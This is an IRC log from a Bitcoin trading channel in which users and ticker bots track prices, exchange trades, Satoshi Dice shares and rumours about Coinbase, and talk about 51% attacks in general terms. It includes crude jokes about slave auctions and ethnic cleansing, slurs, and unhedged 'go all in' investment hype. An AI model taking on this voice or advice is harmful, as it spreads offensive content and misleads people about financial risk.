stock trading really worth it? Mar 28 14:31:51 its probably more liquid than i make it out to be Mar 28 14:32:11 liwuidty comees and goes Mar 28 14:32:49 mh Mar 28 14:32:51 there were are few trading bots running on S.MPOE for a long time Mar 28 14:32:58 :o Mar 28 14:33:01 but haven't seen them in the past few weeks Mar 28 14:33:06 maybe they lost money :-P Mar 28 14:33:22 one or two moved to s.dice Mar 28 14:33:27 I prefer being able to get in and out without much hassle, even with mtgox lag the risk is fairly limited Mar 28 14:33:28 but those are off now too Mar 28 14:33:45 Hmm... little pullback here Mar 28 14:33:46 but with stocks i dunno, is there a good site with historic charts? Mar 28 14:33:51 [BTCTC] [GSDPT] 51 @ 0.003818 = 0.1947 BTC [-] Mar 28 14:33:54 [BTCTC] [GSDPT] 10 @ 0.003817 = 0.0382 BTC [-] Mar 28 14:33:55 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.33308869 = 333.0887 BTC [+] Mar 28 14:33:58 [BTCTC] [GSDPT] 1 @ 0.00343 BTC [-] Mar 28 14:34:03 oh fuck! Mar 28 14:34:13 ah Mar 28 14:34:15 selling to the bot Mar 28 14:34:22 I thought my ask got hit Mar 28 14:34:40 talk about a premature sale Mar 28 14:34:58 i want to see retracement and consolidation on good news. <<< this. Mar 28 14:35:02 who's fdas ? Mar 28 14:35:02 what is someone so clueless doing with 1000 C610Ts Mar 28 14:35:18 tiberiusiv: why do you think Faber is a drunk? Mar 28 14:35:49 Bugpowder seeling them it seems Mar 28 14:36:32 yah I guess if you have 5000 C610Ts you might want to get ahead of the curve on the sale Mar 28 14:37:04 bitcoin made front page of drudge report. Mar 28 14:37:44 yah i saw that Mar 28 14:38:42 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.31112439 = 311.1244 BTC [+] Mar 28 14:39:02 hm Mar 28 14:39:08 maybe we get that correction after all. Mar 28 14:39:22 Yah I thought it might come a day early Mar 28 14:39:36 people wanting to jump the gun on weekend weekness Mar 28 14:39:47 ;;bids 0 Mar 28 14:39:50 There are currently 34623114 bitcoins demanded at or over 0.0 USD, worth 9311886.37161 USD in total. | Data vintage: 0.0202 seconds Mar 28 14:39:57 a little softness Mar 28 14:40:06 not terrible though Mar 28 14:40:55 this move means nothing yet Mar 28 14:40:58 yeah Mar 28 14:41:00 i imagine most outstanding option interest will close today actually Mar 28 14:41:09 yah Mar 28 14:41:11 prolly people too edgy to hunker down for friday lockdown Mar 28 14:41:12 risk off Mar 28 14:41:26 they could just exercise though Mar 28 14:41:32 on friday Mar 28 14:42:00 true Mar 28 14:42:05 if prie stays above 90, probly worth holding til then Mar 28 14:42:08 price Mar 28 14:42:25 above 90 today* Mar 28 14:43:04 [HAVELOCK] [VTX] 1 @ 0.46 BTC [-] Mar 28 14:45:37 The big gains in price seem to be happening at morning it Romania, is it you mp? ;) Mar 28 14:47:09 lol Mar 28 14:47:41 ya, my slavegirls for bitcoin auctions are at noon so all the rich emirs are buying their bitcoin early. Mar 28 14:48:05 thats a lotta girls Mar 28 14:48:10 or some very fine ones at least Mar 28 14:49:33 only the best this side of the river nile. Mar 28 15:01:04 [HAVELOCK] [VTX] 3 @ 0.46 = 1.38 BTC [-] Mar 28 15:01:28 where is the bitcointalk thread about btcquick? Mar 28 15:02:37 https://bitcointalk.org/index.php?topic=159716.msg1688643#msg1688643 Mar 28 15:02:56 weird, search must be jibberred up Mar 28 15:02:58 thx Mar 28 15:07:07 1 billion, yay Mar 28 15:10:10 got my first friend calling me asking about buying ONE bitcoin Mar 28 15:10:22 "I just wanna buy one to save it" Mar 28 15:11:15 been posting about btc on my facebook feed since $20, people wait til $93 to ask Mar 28 15:11:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19996 BTC [+] Mar 28 15:11:16 save it from the evil noms of people ? Mar 28 15:12:23 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19997 = 0.3999 BTC [+] Mar 28 15:13:19 [BTCTC] [BITVPS] 1 @ 0.00589 BTC [+] Mar 28 15:15:03 [BTCTC] [BITVPS] 1 @ 0.0059 BTC [+] Mar 28 15:16:22 [BTCTC] [BITVPS] 98 @ 0.006 = 0.588 BTC [+] Mar 28 15:17:09 [BTCTC] [BITVPS] 1 @ 0.00599 BTC [-] Mar 28 15:17:14 [BTCTC] [BITVPS] 99 @ 0.006 = 0.594 BTC [+] Mar 28 15:17:37 s.dice volume rocketed up Mar 28 15:17:44 the big winner from yesterday lost it all Mar 28 15:17:45 http://blockchain.info/charts/balance?address=1EvdzQZtdSDtcTBvcNy6qcsRQyhrKtEf91 Mar 28 15:18:02 whodat? Mar 28 15:18:31 oh Mar 28 15:18:41 nvm Mar 28 15:18:56 [BTCTC] [BITVPS] 200 @ 0.006 = 1.2 BTC [+] Mar 28 15:20:00 [BTCTC] [BITVPS] 3 @ 0.006 = 0.018 BTC [+] Mar 28 15:20:03 [BTCTC] [BITVPS] 75 @ 0.006 = 0.45 BTC [+] Mar 28 15:20:05 [BTCTC] [BITVPS] 22 @ 0.00601 = 0.1322 BTC [+] Mar 28 15:22:30 !ticker m S.DICE Mar 28 15:22:31 [MPEX:S.DICE] 1D: 0.00310001 / 0.00375185 / 0.00448 (74503 shares, 279.52 BTC), 7D: 0.00310001 / 0.00410842 / 0.00499997 (208663 shares, 857.28 BTC), 30D: 0.00300001 / 0.00514212 / 0.0063799 (1225687 shares, 6,302.63 BTC) Mar 28 15:22:36 HMM Mar 28 15:23:16 today is the day of leveraged platforms Mar 28 15:23:19 along with kraken https://bitcointalk.org/index.php?topic=156298.0 Mar 28 15:23:23 now this. Mar 28 15:23:29 !ticker h him Mar 28 15:23:32 [HAVELOCK:HIM] 1D: 1.80000000 / 1.82978723 / 1.85000000 (47 shares, 86.00000000 BTC), 7D: 1.41000000 / 1.73766344 / 2.00000000 (186 shares, 323.20540034 BTC), 30D: 1.40000000 / 1.93289075 / 18.00000000 (697 shares, 1347.22485269 BTC) Mar 28 15:24:39 lol, coinbase is out of BTC again. :D Mar 28 15:25:06 did they ever have them? Mar 28 15:35:07 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 28 15:38:55 my gut tells me that's there's an "undisclosed problem" over at coinbase... Mar 28 15:39:05 bitcoinstore went from like 20% to 50% in a day or two? Mar 28 15:39:17 pgp its multiple of them Mar 28 15:39:17 no real fact to back that up - just a feeling... Mar 28 15:39:59 agreed... something shady going on there... Mar 28 15:40:55 i heard so much shit/bugs/lol regarding them its not even funny Mar 28 15:43:29 ;;ticker Mar 28 15:43:29 BTCUSD ticker | Best bid: 93.75570, Best ask: 93.96999, Bid-ask spread: 0.21429, Last trade: 93.96999, 24 hour volume: 68563.92218634, 24 hour low: 86.13000, 24 hour high: 95.70000, 24 hour vwap: 90.32462 Mar 28 15:43:38 ;;bc,24hprc Mar 28 15:43:39 90.08 Mar 28 15:43:49 [MPEX] [S.MPOE] 3350 @ 0.00060983 = 2.0429 BTC [-] Mar 28 15:43:50 [MPEX] [S.MPOE] 9461 @ 0.00061111 = 5.7817 BTC [+] Mar 28 15:44:04 [HAVELOCK] [VTX] 23 @ 0.49999 = 11.4998 BTC [+] Mar 28 15:47:04 [HAVELOCK] [KCIM] 1 @ 0.9951 BTC [+] Mar 28 15:48:03 [HAVELOCK] [SDICE] 2 @ 0.381 = 0.762 BTC [+] Mar 28 15:53:14 btw - the "grownups" over at tradehill have yet to offer anything more than their shockingly underwhelming alpha product... Mar 28 15:53:47 so there is a product? Mar 28 15:53:55 last time i checked it was nada Mar 28 15:54:33 a "test" platform Mar 28 15:55:45 which is soooo bare bones that it makes a concentration camp look like a country club... Mar 28 15:58:56 lol Mar 28 15:59:16 country club can be quite hard core Mar 28 15:59:29 it's laughable... Mar 28 15:59:48 and, frankly, embarassing... Mar 28 15:59:49 hehe Mar 28 15:59:49 bbl Mar 28 15:59:51 [BTCTC] [S.MPOE-PT] 5000 @ 0.00066 = 3.3 BTC [-] Mar 28 16:02:03 my concern with coinbase is that they clearly don't keep your btc in a 'wallet' of your own. Mar 28 16:02:03 my guess is that they had some sort of immutable deadline to hit with investors... Mar 28 16:02:59 deadweasal: i've heard that they've cancelled transactions a week after the fact... Mar 28 16:06:37 pgp, they have. A LOT. Mar 28 16:08:38 https://bitcointalk.org/index.php?topic=99497.msg1692732#msg1692732 Mar 28 16:08:42 AM update Mar 28 16:12:37 where is asicminer located? Mar 28 16:12:38 [MPEX] [S.DICE] 1800 @ 0.00350012 = 6.3002 BTC [-] Mar 28 16:12:40 [MPEX] [S.DICE] 5000 @ 0.00350011 = 17.5006 BTC [-] Mar 28 16:12:42 [MPEX] [S.DICE] 2000 @ 0.0033 = 6.6 BTC [-] Mar 28 16:12:43 [MPEX] [S.DICE] 1025 @ 0.00310001 = 3.1775 BTC [-] Mar 28 16:12:45 [MPEX] [S.DICE] 325 @ 0.00310001 = 1.0075 BTC [-] Mar 28 16:12:46 [MPEX] [S.DICE] 467937 @ 0.0031 = 1450.6047 BTC [-] Mar 28 16:13:38 oh my Mar 28 16:13:49 damientrog: china Mar 28 16:13:51 time to sell asicminer... while you can... Mar 28 16:14:08 ah thanks Mar 28 16:14:19 what do you mean pgp? Mar 28 16:14:38 ;;ticker Mar 28 16:14:39 BTCUSD ticker | Best bid: 93.87501, Best ask: 93.96999, Bid-ask spread: 0.09498, Last trade: 93.96999, 24 hour volume: 68633.28583622, 24 hour low: 86.29010, 24 hour high: 95.70000, 24 hour vwap: 90.39382 Mar 28 16:14:59 ;;seen smickles Mar 28 16:14:59 smickles was last seen in #bitcoin-assets 11 hours, 52 minutes, and 37 seconds ago: "Seeing your picture my grandchild starts crying." Mar 28 16:15:01 wow thats a lot of sdice Mar 28 16:15:04 [HAVELOCK] [SDICE] 5 @ 0.381 = 1.905 BTC [+] Mar 28 16:15:05 [HAVELOCK] [SDICE] 7 @ 0.3804 = 2.6628 BTC [-] Mar 28 16:15:07 [HAVELOCK] [SDICE] 3 @ 0.3803 = 1.1409 BTC [-] Mar 28 16:15:07 [HAVELOCK] [SDICE] 5 @ 0.3802 = 1.901 BTC [-] Mar 28 16:15:08 [HAVELOCK] [SDICE] 10 @ 0.38000001 = 3.8 BTC [-] Mar 28 16:15:09 [HAVELOCK] [SDICE] 5 @ 0.38 = 1.9 BTC [-] Mar 28 16:15:10 [HAVELOCK] [SDICE] 7 @ 0.37031001 = 2.5922 BTC [-] Mar 28 16:15:11 [HAVELOCK] [SDICE] 6 @ 0.3703 = 2.2218 BTC [-] Mar 28 16:15:21 yah dude Mar 28 16:15:31 I guess they haven't seen the latest numbers Mar 28 16:15:33 yikes Mar 28 16:15:58 whats the latest numbers? Mar 28 16:17:19 my gut tells me that's there's an "undisclosed problem" over at coinbase... << i read someone saying something similar iirc Mar 28 16:17:21 what exatly ? Mar 28 16:17:57 +700 BTC! Mar 28 16:18:08 ok not that awesome Mar 28 16:18:17 but positive :) Mar 28 16:18:28 do you this month's profit for SDice? Mar 28 16:18:37 do you mean Mar 28 16:19:03 [HAVELOCK] [HIM] 1 @ 1.8 BTC [-] Mar 28 16:19:18 If I had to guess, I'd say that coinbase is doing the same thing that lots of struggling companies do - "vendor financing" Mar 28 16:19:23 o boy. Mar 28 16:19:42 so incidentally, cavirtex raised 5k btc on theory they will get regulated Mar 28 16:19:46 extending their payables and using the float to stay alive... Mar 28 16:19:54 instead using that as a nest egg to compete in the bitfinex/icbit scamspace ? Mar 28 16:20:02 what the fuck is wrong with people! Mar 28 16:20:04 [HAVELOCK] [VTX] 1 @ 0.47 BTC [-] Mar 28 16:20:05 [HAVELOCK] [VTX] 2 @ 0.46 = 0.92 BTC [-] Mar 28 16:20:07 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Mar 28 16:20:20 no wonder it got slaughtered ;/ Mar 28 16:20:24 mp, can i get a deposit cleared Mar 28 16:20:25 lol Mar 28 16:20:45 me too please mircea Mar 28 16:21:05 haven't you heard? there are no "grownups" over there... Mar 28 16:21:19 deposits flushed. Mar 28 16:21:25 Thank you Mar 28 16:21:30 pgp it's sad tho Mar 28 16:21:55 i mean... there's a bridge and a hole and a line of people Mar 28 16:22:03 everyone steps in the hole, falls to their death Mar 28 16:22:11 it's getting weary to look at. Mar 28 16:22:37 you can lead a horse to water... Mar 28 16:23:15 "unskilled and unaware. how lacking metacognitive skills prevent internet tards from realising just how stupid they really are" Mar 28 16:24:05 Socrates would approve of that statement - for sure... Mar 28 16:24:36 pgp socrate would only approve of it if it were rephrased as aquestion. Mar 28 16:25:47 lol Mar 28 16:26:56 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Mar 28 16:27:44 in any case, i think that all of the young, budding, bitcoin entrepreneurs out there should not the following: if it's worth doing then it's probably worth doing it well Mar 28 16:28:05 "note" the following... Mar 28 16:28:26 yah Mar 28 16:28:38 !ticker m s.dice Mar 28 16:28:39 [MPEX:S.DICE] 1D: 0.0031 / 0.00319353 / 0.00448 (552590 shares, 1,764.71 BTC), 7D: 0.0031 / 0.00341094 / 0.00499997 (686750 shares, 2,342.47 BTC), 30D: 0.00300001 / 0.00457092 / 0.0063799 (1703774 shares, 7,787.83 BTC) Mar 28 16:29:03 pgp the budding bitcoin entreprewhatevers still have much more basic issues, such as for instance dealing with their daddy complexes Mar 28 16:29:51 coming up on 15:00... excited for some more volume! Mar 28 16:30:04 wake up san francisco, $100 is calling! Mar 28 16:30:24 so basically s.dice has fallen, from 0.0032 per share when btc was 9 usd Mar 28 16:30:29 to 0.0031 per share when btc is 90 Mar 28 16:30:40 yup Mar 28 16:30:47 ;;tickeer Mar 28 16:30:49 Error: "tickeer" is not a valid command. Mar 28 16:30:49 ;;ticker Mar 28 16:30:50 BTCUSD ticker | Best bid: 94.03900, Best ask: 94.20000, Bid-ask spread: 0.16100, Last trade: 94.20000, 24 hour volume: 69119.18421854, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 90.46821 Mar 28 16:30:59 ;;calc 90.46821 * 319353 Mar 28 16:30:59 28891294.2681 Mar 28 16:31:03 awful. Mar 28 16:31:18 it's all about your base currency frame of reference... Mar 28 16:31:31 prolly should add the dividends in that calculation but im lazy Mar 28 16:31:42 $depth s.dice Mar 28 16:31:44 mircea_popescu: S.DICE Bids: ['5600 @ 0.0032', '3000 @ 0.00310001', '337063 @ 0.0031', '100 @ 0.00100121', '3000 @ 0.00100002'] Mar 28 16:31:45 mircea_popescu: Asks: ['3000 @ 0.00398999', '12548 @ 0.00399997', '53154 @ 0.00399999', '3815 @ 0.00448', '9896 @ 0.00475'] Mar 28 16:31:47 and betting volume has fallen from ~200,000BTC / mo to ~200,000 BTC /mo Mar 28 16:31:55 gross it by 50% or so then Mar 28 16:32:03 Bugpowdeer ya but conversely, it failed to grow from 200k to 200k. Mar 28 16:32:05 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Mar 28 16:32:21 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 28 16:32:26 lol Mar 28 16:32:26 anyway, there's like 1-2k more at 31, after which 0.001 ? 0.0008 ? Mar 28 16:32:48 !ticker m S.MPOE Mar 28 16:32:49 [MPEX:S.MPOE] 1D: 0.00060077 / 0.00060853 / 0.00061253 (59306 shares, 36.09 BTC), 7D: 0.00060001 / 0.00066987 / 0.00073756 (1728845 shares, 1,158.11 BTC), 30D: 0.00060001 / 0.00073582 / 0.00078628 (16755389 shares, 12,329.08 BTC) Mar 28 16:32:52 I doubt it trades for long under .003 Mar 28 16:33:03 [HAVELOCK] [VTX] 14 @ 0.446 = 6.244 BTC [-] Mar 28 16:33:11 expected dividends will be 1.33% /mo at .003 Mar 28 16:33:14 $depth s.mpoe Mar 28 16:33:16 Bugpowdeer well here's the thing : if old blood sells s.dice to get btc to sell for usd to get a new car/house/gf Mar 28 16:33:16 thestringpuller: S.MPOE Bids: ['14053 @ 0.00060778', '6420 @ 0.00060001', '100000 @ 0.0006', '20200 @ 0.00059977', '8272 @ 0.00058185'] Mar 28 16:33:17 assuming growth never returns Mar 28 16:33:18 thestringpuller: Asks: ['2003 @ 0.00061111', '15900 @ 0.00061412', '11865 @ 0.00062464', '14100 @ 0.00062766', '1300 @ 0.00068293'] Mar 28 16:33:28 and new blood buys btc and then goes and invests it in bitbillions and equivalents Mar 28 16:33:40 lol Mar 28 16:33:44 i'm like fucking sysyphus over here, gotta start over educating the crowd Mar 28 16:33:48 at the glbse moment. Mar 28 16:33:54 sucks. Mar 28 16:33:54 ;;ticker Mar 28 16:33:55 BTCUSD ticker | Best bid: 94.49990, Best ask: 94.50000, Bid-ask spread: 0.00010, Last trade: 94.50000, 24 hour volume: 69356.59162769, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 90.48276 Mar 28 16:34:10 ;;bc,24hprc Mar 28 16:34:11 90.33 Mar 28 16:34:23 is anyone here NOT expecting a massive selloff at $100? Mar 28 16:34:34 .Satoshi Dice is all good- people need to remember there have been many distractions this month Mar 28 16:34:38 splnkr_ i dunno. maybe. Mar 28 16:34:42 Avalon Mar 28 16:34:48 High BTC price Mar 28 16:34:51 I'm expecting one at $103 Mar 28 16:34:56 or is there enough trading in other currencies that the USD psychological sell ceiling won't have that much of an impact? Mar 28 16:35:01 House break even so far Mar 28 16:35:03 jborkl the main concern really is that with the inflow of new people drawn in by all the media exposure Mar 28 16:35:10 there's a huge influx of scammers looking to fleece them Mar 28 16:35:25 with a little bit of bad luck we might end up drowned to the point where scammer discourse becomes the central discourse of btc Mar 28 16:35:31 this move up have been really stong, but the ride WILL get bumpy Mar 28 16:35:32 that is a lot more concerning than any sort of crash Mar 28 16:35:34 i dont think selloff will be huge at $100 Mar 28 16:35:40 Well, that is true - it almost happened before Mar 28 16:36:15 we thought selloff at 30 and 50 too Mar 28 16:36:17 so yeah... i want to ask everyone to be as vocal as time permits about what's what. Mar 28 16:36:24 if scammers take over btc... there's no sort of future. Mar 28 16:36:32 i agree, public perception matters more than anything else Mar 28 16:36:43 pgp esp in the next 3-6 months. Mar 28 16:36:44 Ok, I like pointing out scammers- they are easy to find Mar 28 16:36:51 let me go to otc for a minute Mar 28 16:36:51 and it doesn't take much to puncture scammer "consensus". Mar 28 16:36:54 lol Mar 28 16:37:16 in all seriousness , mp is correct Mar 28 16:37:28 I've got some tullip bulbs for sale... Mar 28 16:37:46 I have to applaud mp for not being GLBSE and listing shitty products Mar 28 16:37:58 [BTCTC] [CRYPTO-TRADE] 5 @ 0.19997 = 0.9999 BTC [+] Mar 28 16:38:05 agreed Mar 28 16:38:11 applaud me when i'm dead. Mar 28 16:38:18 meanwhile, there's stuff to do. Mar 28 16:38:54 ok, , I will go to the forum- shudders in disdain Mar 28 16:39:02 yeah, like working on a snazzy new HTML5 GUI for mpex? Mar 28 16:39:35 pgp you mean smickles' thing ? Mar 28 16:40:03 it seems tough to analyze the amount of "black hat" types here... Mar 28 16:40:11 just kidding Mar 28 16:40:25 mircea_popescu> that is a lot more concerning than any sort of crash Mar 28 16:40:30 what not kills you makes you stronger Mar 28 16:40:35 my feeling is a large number of "unknown" miners are actually "white hats" that just want their BTC to be 100% private so they can use it without the oversight of prying eyes Mar 28 16:40:43 so community will have to learn to be vigilant Mar 28 16:40:54 if there is too much scamming going on Mar 28 16:40:55 but of course some of them would love to run a 51% attack Mar 28 16:41:06 taub myeah. Mar 28 16:41:21 dont think it will hurt in the long run Mar 28 16:42:20 oh, the 51% attack mh, that's kinda iffy Mar 28 16:42:38 I agree that an emerging mining "oligarchy" could be cause for concern Mar 28 16:43:25 i know i'm new here but i really want to be part of this discussion Mar 28 16:43:48 i've been a miner/trader for only about 30 days, but what a wild ride Mar 28 16:43:58 then by all means, discuss! Mar 28 16:44:02 and can't lie that i'm more interested now that ever... Mar 28 16:44:15 but as a miner, i feel like i have no incentive to collude with other miners Mar 28 16:44:35 its pretty hard to get blocks on your own isnt it Mar 28 16:44:37 ? Mar 28 16:44:47 oh sure taub, i'm in a mining pool Mar 28 16:44:52 i don't mean that Mar 28 16:44:56 yeah... Mar 28 16:45:07 i mean actually knowing and coordinating with people beyond a simple mining pool Mar 28 16:45:16 when i say collude Mar 28 16:46:20 thin line between "coordinated mining collective" and collussion... semantics, really... Mar 28 16:46:30 so as the network hashrate grows like crazy, it will then become prohibitively costly for a malicious party to purchase enough hardware to fork the chain, will it not? Mar 28 16:46:49 assuming ASICS proliferate in the wild Mar 28 16:47:07 I keep hearing that word, its just a scam isn't it? Mar 28 16:47:17 asic? the jury's out Mar 28 16:47:49 if a large entity decided to do a 51% attack, they'd just keep quiet til ready and do it Mar 28 16:48:37 i dont think it will come from pool collusion Mar 28 16:48:45 or anything like that Mar 28 16:49:06 altough the most recent fork incident... Mar 28 16:52:09 ;;asks 100 Mar 28 16:52:09 There are currently 16043.318 bitcoins offered at or under 100.0 USD, worth 1572513.39873 USD in total. | Data vintage: 66.4927 seconds Mar 28 16:52:15 ;;bids 90 Mar 28 16:52:15 There are currently 5158.7942 bitcoins demanded at or over 90.0 USD, worth 472230.45431 USD in total. | Data vintage: 72.6336 seconds Mar 28 16:52:43 The fork was caused by a error, Slush did it (an accident) Mar 28 16:52:52 i' Mar 28 16:53:04 m just noting that the pools did collude to fix it Mar 28 16:53:11 they pulled an attacj Mar 28 16:53:16 "attack" Mar 28 16:53:17 We were all sent notification through bitcoind Mar 28 16:53:30 all? Mar 28 16:53:37 not just pools, anyone the mines and paid attention Mar 28 16:53:55 what if a false alarm were made? Mar 28 16:54:13 i'm just playing along here Mar 28 16:54:16 and what would it say? Mar 28 16:54:32 that would not make sense Mar 28 16:55:29 or how about Mar 28 16:55:43 whomever is making AMs chips Mar 28 16:55:54 leaks their next gen setup Mar 28 16:55:55 ;;bc, prc Mar 28 16:55:55 Error: "bc," is not a valid command. Mar 28 16:56:23 and someone makes a bunch before anyone else Mar 28 16:56:26 and takes over Mar 28 16:56:26 That needs to be fixed, too much is one group- BFL shipping will rebalance Mar 28 16:56:43 one protection Mar 28 16:56:53 is the cost is higher than the incentive Mar 28 16:57:06 unless your goal is simply to keill bitcoin in its current form Mar 28 16:57:07 ;;bc,24hprc Mar 28 16:57:08 90.39 Mar 28 16:57:17 10 million a month is mining revenue currently is passed around Mar 28 16:57:26 ;;calc (90.39-41)/90.39 Mar 28 16:57:26 0.546410001106 Mar 28 16:57:29 so, people protect that Mar 28 16:57:36 indeed Mar 28 16:57:57 A misbehaving node can be controlled Mar 28 16:58:47 what is this? not even a new ath while im gone :) Mar 28 16:59:56 we've been working so hard to get to 95 for you and now you complain! Mar 28 17:00:20 until we get to $10,000 i wont quit bitching! Mar 28 17:00:22 :) Mar 28 17:00:54 you will be bitching then "I shouldn't have sold everything at $150!" Mar 28 17:01:02 lol Mar 28 17:01:22 im an old perma bull Mar 28 17:01:39 when btcv was 3$ i was telling evey i knew to go all in Mar 28 17:01:50 and not sell til 1k Mar 28 17:01:57 not a joke Mar 28 17:02:03 they used to think i was crazy Mar 28 17:04:26 http://www.bbc.co.uk/news/technology-21964881 Mar 28 17:04:39 But bitcoin miners say thieves will struggle to keep up, as coin-generating technology becomes more sophisticated. Mar 28 17:04:56 huh? Mar 28 17:05:11 its a quote found in the link Mar 28 17:05:15 click for context Mar 28 17:05:19 [MPEX] [S.MPOE] 14053 @ 0.00060778 = 8.5411 BTC [-] Mar 28 17:05:19 asic vs botnet Mar 28 17:05:20 [MPEX] [S.MPOE] 2136 @ 0.00060001 = 1.2816 BTC [-] Mar 28 17:05:25 yeah Mar 28 17:05:36 wow, isn't that an odd way of putting it Mar 28 17:06:05 [HAVELOCK] [VTX] 10 @ 0.446 = 4.46 BTC [-] Mar 28 17:06:36 its the bbc Mar 28 17:06:52 they are talking to people like my mom Mar 28 17:07:19 http://www.businessweek.com/articles/2013-03-28/bitcoin-may-be-the-global-economys-last-safe-haven#p2 Mar 28 17:07:20 In other news, my daughter is pissed at this plastic chain. she put it together, but can't yet figure how to take it apart Mar 28 17:07:26 if you missed it, best one in a liong fucknig time Mar 28 17:07:59 swmickles everyone in the world being told about bitcoin is a good thing :/ Mar 28 17:08:09 lol, what's with that pic ath the beginning? Mar 28 17:08:13 even if its dumped down to retard level Mar 28 17:08:34 they all think btc is up cuz cypruz Mar 28 17:08:49 btc is up because btc is up Mar 28 17:08:55 what's new Mar 28 17:09:04 no way i'm paying $100 for bitcoins Mar 28 17:09:04 ;;ticker Mar 28 17:09:05 BTCUSD ticker | Best bid: 94.68001, Best ask: 94.94999, Bid-ask spread: 0.26998, Last trade: 94.68001, 24 hour volume: 67839.20759077, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 90.71155 Mar 28 17:09:09 that's crazy talk Mar 28 17:09:36 you will pay all you have in fiat for $100 btc when market price is north of $1000 Mar 28 17:09:54 google stock is $800 and they have billions of them Mar 28 17:10:56 I wish I had linked the first page of that article instead of the second. D'Oh! Mar 28 17:11:18 thatartical is the first i evar hear d of asics Mar 28 17:11:30 http://www.businessweek.com/articles/2013-03-28/bitcoin-may-be-the-global-economys-last-safe-haven Mar 28 17:11:33 sorry Mar 28 17:11:57 nothing worse than fucking up a link you tweet out Mar 28 17:12:00 NOTHING Mar 28 17:12:15 i assumed you would have read the link before tweeting it out Mar 28 17:12:27 ethnic cleansing may be worse...MAY Mar 28 17:12:28 the #p2 at the end gave it away Mar 28 17:12:37 jk Mar 28 17:12:43 MJR_ you must be new here Mar 28 17:12:48 ok jk, okay then :) Mar 28 17:13:23 Chaang-Noi: well, the whole world being told about bitcoin being 'hilarious' isn't so nifty Mar 28 17:14:46 before it was btc a scam Mar 28 17:14:53 or ponzi for drugs and cp Mar 28 17:15:04 world news is slowly warming Mar 28 17:15:06 now its a joke on the global financial system Mar 28 17:15:22 now its,. hahaha world banks suck... bitcoin??? Mar 28 17:15:34 doesnt matter Mar 28 17:15:39 wait for holy fuckig shit buy BTC nowwwwS!@!!!! Mar 28 17:15:41 any exposure helps Mar 28 17:15:47 yes Mar 28 17:15:56 no fucking doubt Mar 28 17:16:13 there is always a percent of the population that will do what they are told not to do Mar 28 17:16:36 once btc is THE system we can worry about what they print not if they print Mar 28 17:16:55 oh, btw im a perma bull Mar 28 17:17:22 zup DeaDTerra Mar 28 17:20:56 you gona get gored:) Mar 28 17:21:25 ;;asks 100 Mar 28 17:21:26 There are currently 14210.284 bitcoins offered at or under 100.0 USD, worth 1394105.41065 USD in total. | Data vintage: 31.3003 seconds Mar 28 17:21:46 even if we correct im a long term btc bull, i aint selling Mar 28 17:22:42 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.33904992 = 339.0499 BTC [+] Mar 28 17:22:56 ;;calc 61/(1-.339) Mar 28 17:22:56 92.2844175492 Mar 28 17:23:05 ;;ticker Mar 28 17:23:06 BTCUSD ticker | Best bid: 94.45001, Best ask: 94.90000, Bid-ask spread: 0.44999, Last trade: 94.90000, 24 hour volume: 66648.47894810, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 90.82810 Mar 28 17:23:20 ;;bc,24hprc Mar 28 17:23:21 90.65 Mar 28 17:23:32 i have champagne on ice, hope i can have it for brekfast :) Mar 28 17:28:08 Chaang-Noi: if you had to guess, today, tomorrow, or neither? Mar 28 17:29:10 you mean hitting 100? Mar 28 17:29:47 yeah Mar 28 17:29:58 and did apple ban bitcoin? Mar 28 17:31:45 i dont see any reason why the next 24 hours wont be just like the last, we'll hover somewhere under 100 til about 6:30UTC, and then break 100 Mar 28 17:32:39 smickles i dont know cuz the massive weekend for the zobarz Mar 28 17:32:39 [BTCTC] [PAJKA.BOND] 4 @ 0.1078 = 0.4312 BTC [+] Mar 28 17:33:00 smickes apple did! but then now its back Mar 28 17:33:10 so i bought an apple computer Mar 28 17:33:36 some people fear 100 and then correction so sell before 100 Mar 28 17:33:46 and thus with the long weekend a hard fight (maybe) Mar 28 17:33:56 then again, its only 1 fucking million fiat Mar 28 17:34:28 ;;asks 98.99 Mar 28 17:34:29 There are currently 8654.7753 bitcoins offered at or under 98.99 USD, worth 836893.149398 USD in total. | Data vintage: 44.7241 seconds Mar 28 17:34:30 i mean smickles Mar 28 17:34:38 iv been drinki9ng Mar 28 17:42:18 will gox be open friday? Mar 28 17:42:22 i mean the staff? Mar 28 17:42:35 cuz all the perv at home doing nothing then getting fiat in accounts might buy it up Mar 28 17:44:48 mtgox doesn't accept anime? or at least hentai? Mar 28 17:45:38 http://google-opensource.blogspot.co.uk/2013/03/taking-stand-on-open-source-and-patents.html Mar 28 17:50:00 fudr.us down D-': now how we'll live without it? Mar 28 17:51:52 hi Mar 28 17:51:55 what did i miss Mar 28 17:54:52 http://codinginmysleep.com/one-billion-dollars/ Mar 28 17:55:17 jurov what? Mar 28 17:55:28 hentai? wtf Mar 28 17:55:53 yes d3 already drunk cuz Mar 28 17:55:55 they can accept it to be independent from banks Mar 28 17:56:09 context? Mar 28 17:56:09 as a funding/withdrawal method Mar 28 17:56:38 available always, including weekends and free days Mar 28 17:56:49 ok Mar 28 17:58:11 http://en.wikipedia.org/wiki/Roy_Sullivan Mar 28 18:00:43 http://www2.egovlink.com/press-release-bitcoin.cfm Mar 28 18:04:17 this chan is dead? Mar 28 18:04:25 wut Mar 28 18:04:54 guess not:) Mar 28 18:05:08 trying to actually get some non-bitcoin work done Mar 28 18:05:22 there is such a thing anymore? :) Mar 28 18:05:23 well i just tried to provide some entertainment Mar 28 18:05:59 blockchain down? Mar 28 18:06:24 no works from here Mar 28 18:06:37 http://blockchain.info/ works here Mar 28 18:06:47 wallet page down? Mar 28 18:06:54 no idea Mar 28 18:07:01 actually dw Mar 28 18:07:07 it's down for me tho :( Mar 28 18:07:18 https://blockchain.info/wallet/ Mar 28 18:07:22 this works fro me Mar 28 18:08:00 i can get into mine. Mar 28 18:08:19 why do you use an online wallet site? 